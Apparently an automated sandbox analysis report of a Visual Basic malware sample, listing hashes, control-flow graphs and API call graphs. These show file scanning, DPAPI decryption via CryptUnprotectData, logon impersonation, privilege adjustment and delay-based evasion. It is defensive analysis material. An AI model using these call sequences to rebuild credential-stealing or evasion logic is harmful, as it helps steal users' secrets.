                                  • Source File: 00000000.00000002.1786524627.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22c0000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 1190572bcb732bd28b8ecc24f46695a1ef7543f1b9fae838062e9bfedaade888
                                  • Instruction ID: 1639c341c2bfaba1cec10df541861aef55eb1794c8c93bf0159fec052912df36
                                  • Opcode Fuzzy Hash: 1190572bcb732bd28b8ecc24f46695a1ef7543f1b9fae838062e9bfedaade888
                                  • Instruction Fuzzy Hash: 1C52B120A5EBCC29DF5392B1809F349FF92EB5321CE2859CDC8C50949BD6A5245ED3CC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 621 22c0974-22c097d GetPEB 622 22c0980-22c098b 621->622 622->622 623 22c098d-22c0994 622->623 623->622 624 22c0996-22c09ac 623->624 625 22c09af-22c09b2 624->625 625->625 626 22c09b4-22c09bd 625->626 626->625 627 22c09bf-22c09c6 626->627 627->625 629 22c09c8-22c09d6 627->629 630 22c09d9-22c09dc 629->630
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786524627.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22c0000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b798d3596342e06e089cdd3acfed51839b12bc0631385fa134e17b98d730370
                                  • Instruction ID: 58e99fbd58dc2af3df9d314a671bc29c15cf1f226bdafbd2118502a77033d8e3
                                  • Opcode Fuzzy Hash: 1b798d3596342e06e089cdd3acfed51839b12bc0631385fa134e17b98d730370
                                  • Instruction Fuzzy Hash: 37016D72651611DFE724CF89C9C0F22B3E8FF58660F458599E9849B311C374ED40CA76
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 495d40-495dee #606 __vbaStrMove __vbaFreeVar 1 495e00-495e15 0->1 2 495df0-495dfa __vbaNew2 0->2 4 495e29-495e5c call 495c90 __vbaStrMove __vbaFreeStrList 1->4 5 495e17-495e23 __vbaHresultCheckObj 1->5 2->1 8 495e6e-495e88 4->8 9 495e5e-495e68 __vbaNew2 4->9 5->4 11 495e8a-495e96 __vbaHresultCheckObj 8->11 12 495e9c-495ecf __vbaVarMove 8->12 9->8 11->12 13 495ee1-495ef2 12->13 14 495ed1-495edb __vbaNew2 12->14 16 495f03-4970f8 call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove call 495c80 __vbaVarMove 13->16 17 495ef4-495efd __vbaHresultCheckObj 13->17 14->13 346 4970fe-49717b __vbaVarAdd __vbaVarMove #685 __vbaObjSet __vbaFreeObj __vbaVarTstNe 16->346 17->16 348 49717d-497184 346->348 349 497196-4971f3 __vbaObjSetAddref __vbaStrCopy #519 __vbaStrMove __vbaVarTstNe 348->349 350 497186-497190 __vbaNew2 348->350 351 497225-49722b 349->351 352 4971f5-497223 __vbaVarMul __vbaVarMove 349->352 350->349 353 497235-49726b __vbaCyI4 __vbaCyAdd __vbaUbound 351->353 352->351 354 49726d #598 353->354 355 497273-49728f __vbaFpCmpCy 353->355 354->355 355->353 356 497291-4972e2 __vbaLateMemCallLd __vbaVarTstNe __vbaFreeVar 355->356 357 4972e8-497302 356->357 358 4973ef-49746f __vbaFreeVar __vbaFreeStr __vbaFreeVar * 3 __vbaFreeStr __vbaFreeVar * 2 __vbaFreeStr 356->358 359 497314-49732e 357->359 360 497304-49730e __vbaNew2 357->360 363 497330-49733c __vbaHresultCheckObj 359->363 364 497342-497382 __vbaVarMove __vbaI4Var call 401cb0 359->364 360->359 363->364 366 497387-4973b2 __vbaSetSystemError __vbaCyI4 364->366 367 4973c4-4973ec __vbaVarSetObjAddref __vbaObjVar __vbaLateMemCall 366->367 368 4973b4-4973be __vbaNew2 366->368 367->358 368->367
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786127270.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1786114726.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786190951.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786206280.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: __vba$Move$Free$New2$CheckHresult$AddrefCallLate$#519#598#606#685CopyErrorListSystemUbound
                                  • String ID: BackColor$Mordacity$Show
                                  • API String ID: 3086201817-4036925007
                                  • Opcode ID: aa626676b63e93a84a9658ba95a4a7944524682f63d934c0f8e9e9b6c06d6375
                                  • Instruction ID: c306d103fa504d18055502281bc4af7c1779be4d735677a9971e73afb46fec34
                                  • Opcode Fuzzy Hash: aa626676b63e93a84a9658ba95a4a7944524682f63d934c0f8e9e9b6c06d6375
                                  • Instruction Fuzzy Hash: 8AE25270C04729CEEF21EF65C980BECFBB6AF58304F50819ED51962245EB781B858F66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 369 22c158c-22c15b7 call 22c0974 372 22c1642-22c165c 369->372 374 22c1815-22c181c 372->374 375 22c1662-22c166d 372->375 378 22c181e-22c1831 374->378 379 22c1842-22c184a TerminateProcess 374->379 376 22c184c-22c1863 375->376 377 22c1673-22c1678 375->377 385 22c183d 376->385 377->376 380 22c167e-22c1683 377->380 378->385 379->376 380->376 381 22c1689-22c168e 380->381 381->376 384 22c1694-22c1699 381->384 384->376 386 22c169f-22c16a4 384->386 385->372 386->376 387 22c16aa-22c17b7 386->387 387->376 389 22c17bd-22c17c2 387->389 389->376 390 22c17c8-22c17cd 389->390 390->376 391 22c17cf-22c17d4 390->391 391->376 392 22c17d6-22c17db 391->392 392->376 393 22c17dd-22c17e2 392->393 393->376 394 22c17e4-22c17e9 393->394 394->376 395 22c17eb-22c17f0 394->395 396 22c19af-22c19c6 395->396 397 22c17f6-22c17fb 395->397 396->385 397->376 398 22c17fd-22c1802 397->398 399 22c1808-22c180d 398->399 400 22c19cb-22c19d4 398->400 399->396 402 22c1813 399->402 400->376 403 22c19da-22c19dd 400->403 402->376 403->376 404 22c19e3-22c1a3a 403->404 408 22c1a3f-22c1a43 404->408 408->408 409 22c1a45-22c1af9 408->409 409->385
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,022C319B), ref: 022C1846
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786524627.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22c0000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID: MOC$csm
                                  • API String ID: 560597551-1389381023
                                  • Opcode ID: 5c5fefae90a5ce86204e0d3f42c4fddd59d5c765c12ae7dfd2dac0e79c5fd4e8
                                  • Instruction ID: a5a644e563b570ea5fed34413fb3f1dff9bc6a02112954dc292734569c7e532e
                                  • Opcode Fuzzy Hash: 5c5fefae90a5ce86204e0d3f42c4fddd59d5c765c12ae7dfd2dac0e79c5fd4e8
                                  • Instruction Fuzzy Hash: 46412A3521C503BBFB294AA4C897BD8B626BB09304F744719E61DC6166CB7594F0D741
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 413 4012b0-4012cf #100
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786127270.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1786114726.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786190951.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786206280.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: #100
                                  • String ID: VB5!6&*
                                  • API String ID: 1341478452-3593831657
                                  • Opcode ID: 1a805add9535dbbd199196c14ab3a16ea0cdab892c0dbb42ea38538cb5670bfc
                                  • Instruction ID: 873afd9fe609abf806e1e20fafe2f01d319e9e4b39a7c5ad722bc4f3e8af34a4
                                  • Opcode Fuzzy Hash: 1a805add9535dbbd199196c14ab3a16ea0cdab892c0dbb42ea38538cb5670bfc
                                  • Instruction Fuzzy Hash: 7AD0B64090E3C01ED303233518220012F700D4321830B04EBD080EF0F7806C4C0AC336
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 517 22c0297-22c0298 518 22c029a-22c02ac Sleep 517->518 520 22c31cf-22c3ab7 518->520 521 22c02b2-22c02bf 518->521 521->518 524 22c02c1-22c03b5 GetPEB 521->524 524->520
                                  APIs
                                  • Sleep.KERNELBASE(00000001), ref: 022C029C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786524627.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22c0000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 08033c061eadb672c6dbb8311d07d0138e17e89e9e960272063b93fd423d7ee0
                                  • Instruction ID: 1d96eb6beeec0fff054d40877619595e481e75d6bc51e2d725df9057f9cd6422
                                  • Opcode Fuzzy Hash: 08033c061eadb672c6dbb8311d07d0138e17e89e9e960272063b93fd423d7ee0
                                  • Instruction Fuzzy Hash: B152B120A5EBCC29DF5392B1809F749FF92EB5321CE2899CDD8C50909BD6A5245ED3CC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786524627.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22c0000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                  • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                  • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                  • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00401136), ref: 00495CCA
                                  • #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,00401136), ref: 00495CD7
                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,00401136), ref: 00495CE2
                                  • __vbaInStrB.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,00401136), ref: 00495CEA
                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00401136), ref: 00495CF3
                                  • __vbaFreeStr.MSVBVM60(00495D23,?,?,?,?,?,?,?,?,00401136), ref: 00495D1C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1786127270.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1786114726.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786190951.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1786206280.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_BW38j8Jkbl.jbxd
                                  Similarity
                                  • API ID: __vba$Free$#537CopyMove
                                  • String ID:
                                  • API String ID: 1920444718-0
                                  • Opcode ID: 83f0d8a635328c68b8e8e073ca5300df814b2e5d607b2f17e3e85fe721a880a2
                                  • Instruction ID: b086334ff01f6db8e76894705a7481d4074f19b99e7bb56cce53dc5f3577444d
                                  • Opcode Fuzzy Hash: 83f0d8a635328c68b8e8e073ca5300df814b2e5d607b2f17e3e85fe721a880a2
                                  • Instruction Fuzzy Hash: 84012C75C00559AFCB01DF94DE49AEEBBB8EF08701F108126F546B2660D7781A46CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:26.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.5%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:43
                                  execution_graph 9419 40b043 9420 40b057 9419->9420 9421 40b06b StrStrIA 9420->9421 9422 40b0b0 9420->9422 9425 4018b8 LocalFree 9420->9425 9426 40242b 9420->9426 9436 404351 9420->9436 9421->9420 9425->9420 9427 401df8 5 API calls 9426->9427 9428 40243a lstrlen 9427->9428 9429 402458 StrStrIA 9428->9429 9430 402449 9428->9430 9431 402467 9429->9431 9432 40246b StrRChrIA 9429->9432 9430->9429 9431->9432 9433 402479 lstrlen 9432->9433 9435 40248c 9433->9435 9435->9420 9439 4041a6 9436->9439 9440 4041c5 9439->9440 9443 4041c0 9439->9443 9441 4018b8 LocalFree 9440->9441 9442 40434d 9441->9442 9442->9420 9443->9440 9444 4041e5 9443->9444 9445 4041d6 9443->9445 9447 401df8 5 API calls 9444->9447 9446 401df8 5 API calls 9445->9446 9448 4041e3 9446->9448 9447->9448 9449 404209 FindFirstFileA 9448->9449 9449->9440 9458 404228 9449->9458 9450 40423a lstrcmpiA 9452 404251 lstrcmpiA 9450->9452 9450->9458 9451 4042ce StrStrIA 9453 40431d FindNextFileA 9451->9453 9451->9458 9452->9458 9455 404337 FindClose 9453->9455 9453->9458 9454 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9454->9458 9455->9440 9456 401e4c 6 API calls 9456->9458 9458->9450 9458->9451 9458->9453 9458->9454 9458->9456 9459 4041a6 24 API calls 9458->9459 9460 4018b8 LocalFree 9458->9460 9461 4018b8 LocalFree 9458->9461 9463 40c0ce 9458->9463 9467 40406c 9458->9467 9459->9458 9460->9453 9461->9458 9464 40c0dd 9463->9464 9465 40c0f7 9464->9465 9481 40bf32 9464->9481 9465->9458 9618 401fb9 ExpandEnvironmentStringsA 9467->9618 9470 4040d9 9470->9458 9472 40408b 9473 4040d1 9472->9473 9474 40408f 9472->9474 9475 4018b8 LocalFree 9473->9475 9631 401ffd 9474->9631 9475->9470 9483 40bf40 9481->9483 9482 40bf52 9482->9465 9483->9482 9486 40b736 9483->9486 9485 40c0ca 9485->9465 9487 40b743 9486->9487 9489 40b74d 9486->9489 9487->9485 9488 40b7ce 9488->9485 9489->9488 9526 4018cf LocalAlloc 9489->9526 9491 40b83b 9504 40b845 9491->9504 9520 40b8ec 9491->9520 9492 40b82c 9494 4018b8 LocalFree 9492->9494 9493 40b806 9493->9491 9493->9492 9526->9493 9619 401ff2 9618->9619 9620 401fcf 9618->9620 9619->9470 9625 401f36 9619->9625 9646 4018cf LocalAlloc 9620->9646 9622 401fd6 ExpandEnvironmentStringsA 9622->9619 9623 401fea 9622->9623 9624 4018b8 LocalFree 9623->9624 9624->9619 9626 401f41 9625->9626 9627 401f46 9625->9627 9626->9627 9628 401f50 ExitProcess 9626->9628 9627->9472 9629 401f79 9628->9629 9630 401f6e CloseHandle 9628->9630 9629->9472 9630->9629 9647 4018e6 9631->9647 9646->9622 9648 4018f3 ExitProcess 9647->9648 9660 40f545 9679 40a2a9 9660->9679 9665 40f5e8 9666 40f6ea 9665->9666 9667 40f602 lstrcmpiA 9665->9667 9668 40f630 lstrcmpiA 9667->9668 9669 40f617 lstrcmpiA 9667->9669 9671 40f68d 9668->9671 9672 40f64f lstrcmpiA 9668->9672 9669->9668 9670 40f6df 757283B0 9669->9670 9670->9666 9674 40f699 9671->9674 9675 40f6bd 9671->9675 9672->9671 9673 40f66e lstrcmpiA 9672->9673 9673->9670 9673->9671 9687 40f456 9674->9687 9677 40f456 7 API calls 9675->9677 9677->9670 9678 40f6bb 9678->9670 9680 40a2c5 9679->9680 9681 40a2f0 9680->9681 9682 40a2c9 WideCharToMultiByte 757283B0 9680->9682 9683 40a2f4 9681->9683 9682->9681 9684 40a313 9683->9684 9685 40a317 WideCharToMultiByte 757283B0 9684->9685 9686 40a33e WideCharToMultiByte 9684->9686 9685->9686 9686->9665 9709 402aaa 9687->9709 9690 40f469 9690->9678 9691 40f46e wsprintfA 9692 40f4bf 9691->9692 9694 40f508 9691->9694 9712 402abb 9692->9712 9695 4015cb lstrlen 9694->9695 9724 402a3e 9709->9724 9711 402ab7 9711->9690 9711->9691 9725 402a52 WideCharToMultiByte 9724->9725 9726 402a4b 9724->9726 9727 402aa1 9725->9727 9728 402a6f 9725->9728 9726->9711 9727->9711 9734 4018cf LocalAlloc 9728->9734 9730 402a7a 9730->9727 9731 402a7e WideCharToMultiByte 9730->9731 9731->9727 9734->9730 8981 4105d6 SetUnhandledExceptionFilter 8982 4105e0 8981->8982 8993 40fa90 8982->8993 8984 4105e5 8985 410601 RevertToSelf 8984->8985 8986 410607 8984->8986 8985->8986 8998 410223 8986->8998 8988 410616 9004 41032d 8988->9004 8990 41061b 9021 410065 8990->9021 8992 410620 8994 40faa3 8993->8994 8995 40faa4 8993->8995 8994->8984 8996 40fae9 8995->8996 8997 40fabf GetTickCount 8995->8997 8996->8984 8997->8995 8999 410236 8998->8999 9002 410237 8998->9002 8999->8988 9000 41024a 9000->8988 9001 402aaa LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 9001->9002 9002->9000 9002->9001 9052 4018cf LocalAlloc 9002->9052 9005 410341 9004->9005 9013 410342 9004->9013 9005->8990 9006 410355 9006->8990 9007 410374 lstrcmpiA 9008 41038b LogonUserA 9007->9008 9007->9013 9008->9013 9009 41043a 746B1B10 9009->9013 9011 4103b9 lstrlen LCMapStringA 9011->9013 9014 4103df LogonUserA 9011->9014 9012 41049f ImpersonateLoggedOnUser 9012->9013 9013->9006 9013->9007 9013->9008 9013->9009 9013->9012 9015 4018b8 LocalFree 9013->9015 9016 4104d0 746A5030 9013->9016 9017 4104db CloseHandle 9013->9017 9018 410417 LogonUserA 9013->9018 9019 4104c0 9013->9019 9020 4104ba RevertToSelf 9013->9020 9053 402a1d lstrlen 9013->9053 9014->9013 9015->9013 9016->9017 9017->9013 9018->9009 9018->9013 9019->9013 9020->9019 9022 410077 9021->9022 9023 410078 9021->9023 9022->8992 9057 4018cf LocalAlloc 9023->9057 9025 410088 GetTickCount wsprintfA 9058 4018cf LocalAlloc 9025->9058 9027 4100b2 9059 4018cf LocalAlloc 9027->9059 9029 4100ca 9052->9002 9056 4018cf LocalAlloc 9053->9056 9055 402a2f lstrcpy 9055->9011 9056->9055 9057->9025 9058->9027 9059->9029 9786 40a557 9787 40a2a9 2 API calls 9786->9787 9788 40a572 WideCharToMultiByte 9787->9788 9789 40a5e5 9788->9789 9790 40a70e 9789->9790 9791 40a5ff lstrcmpiA 9789->9791 9792 40a660 StrStrIA 9791->9792 9793 40a61e lstrcmpiA 9791->9793 9795 40a675 9792->9795 9796 40a6e6 9792->9796 9793->9792 9794 40a63d lstrcmpiA 9793->9794 9794->9792 9798 40a703 757283B0 9794->9798 9795->9798 9799 40a682 CryptUnprotectData 9795->9799 9797 40a4e9 lstrlenW 9796->9797 9797->9798 9798->9790 9799->9798 9800 40a6bc 9799->9800 9803 40a4e9 9800->9803 9802 40a6d9 LocalFree 9802->9798 9807 401569 9803->9807 9805 40a4f7 lstrlenW 9806 40a510 9805->9806 9806->9802 9808 40157a 9807->9808 9808->9805 9295 402bda 9296 402be4 9295->9296 9298 402bfc 9296->9298 9299 402968 9296->9299 9300 402978 9299->9300 9301 40298a 9299->9301 9300->9301 9302 402991 LookupPrivilegeValueA 9300->9302 9301->9296 9303 4029ad GetCurrentProcess OpenProcessToken 9302->9303 9308 402a07 9302->9308 9306 4029c5 9303->9306 9307 4029ee AdjustTokenPrivileges 9303->9307 9304 402a16 9304->9296 9305 402a0e CloseHandle 9305->9304 9306->9307 9307->9308 9308->9304 9308->9305 8902 40fc62 8904 40fc6a 8902->8904 8903 40fc7e 8904->8903 8920 4017d5 756D19A0 8904->8920 8906 40fc96 8906->8903 8934 401675 756D19A0 8906->8934 8908 40fca4 8908->8903 8940 4016db 756D19A0 8908->8940 8910 40fcb2 8910->8903 8948 401a27 756D19A0 8910->8948 8912 40fcc5 8912->8903 8913 401675 3 API calls 8912->8913 8914 40fcd3 8913->8914 8914->8903 8915 4016db 3 API calls 8914->8915 8916 40fce1 8915->8916 8916->8903 8917 40fce7 8916->8917 8958 401aec GetTickCount 756D19A0 8917->8958 8921 4017f2 8920->8921 8922 4018a9 8920->8922 8923 4017fa GlobalFix 8921->8923 8922->8906 8923->8922 8924 40180d 8923->8924 8968 4018cf LocalAlloc 8924->8968 8926 401826 8969 4018cf LocalAlloc 8926->8969 8928 40183f 8929 401855 GlobalUnWire 8928->8929 8930 40186b 8929->8930 8970 4018b8 8930->8970 8933 4018b8 LocalFree 8933->8922 8935 401692 8934->8935 8937 4016bf 8934->8937 8936 40169a GlobalFix 8935->8936 8936->8937 8938 4016a9 8936->8938 8937->8908 8939 4016b4 GlobalUnWire 8938->8939 8939->8937 8941 401745 8940->8941 8942 4016f8 8940->8942 8941->8910 8943 401735 8942->8943 8944 401709 GlobalFix 8942->8944 8943->8910 8945 401719 8944->8945 8947 40174b 8944->8947 8946 401724 GlobalUnWire 8945->8946 8946->8947 8947->8910 8949 401a47 8948->8949 8950 401add 8948->8950 8951 401a4f GlobalFix 8949->8951 8950->8912 8951->8950 8952 401a5e 8951->8952 8973 4018cf LocalAlloc 8952->8973 8954 401a69 8955 401a7a GlobalUnWire lstrlen 8954->8955 8956 401a9a 8955->8956 8957 4018b8 LocalFree 8956->8957 8957->8950 8968->8926 8969->8928 8971 4018c1 LocalFree 8970->8971 8972 4018a1 8970->8972 8971->8972 8972->8933 8973->8954 9817 400663 9819 400686 9817->9819 9818 4006df 9819->9818 9821 40f85e 9819->9821 9822 40f86a 9821->9822 9832 409c3c StrStrIA 9822->9832 9825 409c3c 83 API calls 9826 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 9825->9826 9827 409c3c 83 API calls 9826->9827 9828 40f8cf 9827->9828 9829 409c3c 83 API calls 9828->9829 9830 40f8eb SetCurrentDirectoryA 9829->9830 9831 40f902 9830->9831 9831->9818 9833 409c51 9832->9833 9834 409ca8 9832->9834 9863 401d71 9833->9863 9867 4018cf LocalAlloc 9834->9867 9838 409cb2 RegOpenKeyA 9839 409d38 9838->9839 9854 409cc8 9838->9854 9841 4018b8 LocalFree 9839->9841 9840 40242b 9 API calls 9845 409c6e 9840->9845 9843 409d40 9841->9843 9842 409ccf RegEnumKeyExA 9844 409cf4 RegCloseKey 9842->9844 9842->9854 9843->9825 9844->9839 9846 409ca3 9845->9846 9868 401eb1 9845->9868 9849 4018b8 LocalFree 9846->9849 9848 401df8 5 API calls 9848->9854 9849->9834 9852 401e4c 6 API calls 9852->9854 9853 409c9b 9855 4018b8 LocalFree 9853->9855 9854->9842 9854->9848 9854->9852 9857 409c3c 79 API calls 9854->9857 9859 4018b8 LocalFree 9854->9859 9855->9846 9856 401e4c 6 API calls 9858 409c89 9856->9858 9857->9854 9859->9854 9864 401d7d 9863->9864 9916 401c8d 9864->9916 9867->9838 9931 4018cf LocalAlloc 9868->9931 9870 401ec2 9871 401ed0 SHGetFolderPathA 9870->9871 9872 401ece 9870->9872 9871->9872 9876 401f21 9871->9876 9873 4018b8 LocalFree 9872->9873 9874 401eee 9873->9874 9875 401d71 6 API calls 9874->9875 9874->9876 9875->9874 9876->9853 9876->9856 9917 401c9b RegOpenKeyExA 9916->9917 9919 401d4a 9917->9919 9920 401cdb RegQueryValueExA 9917->9920 9921 401d6c 9919->9921 9924 401c8d 2 API calls 9919->9924 9922 401d42 RegCloseKey 9920->9922 9923 401cf6 9920->9923 9921->9834 9921->9840 9922->9919 9923->9922 9930 4018cf LocalAlloc 9923->9930 9924->9921 9926 401d12 RegQueryValueExA 9927 401d2c 9926->9927 9929 401d32 9926->9929 9928 4018b8 LocalFree 9927->9928 9928->9929 9929->9922 9930->9926 9931->9870 12789 40b8e7 12790 